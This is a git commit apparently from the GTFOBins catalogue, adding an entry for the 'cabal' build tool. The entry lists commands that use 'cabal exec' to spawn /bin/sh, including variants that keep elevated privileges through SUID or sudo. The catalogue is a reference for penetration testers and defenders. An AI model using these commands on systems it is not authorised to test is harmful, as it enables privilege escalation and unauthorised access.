Add cabal

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
master
Miguel R 2022-12-16 18:01:10 +01:00 committed by GitHub
parent 0eefa2a716
commit 182c5d3b48
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 0 deletions

9
_gtfobins/cabal.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: cabal exec -- /bin/sh
suid:
- code: ./cabal exec -- /bin/sh -p
sudo:
- code: sudo cabal exec -- /bin/sh
---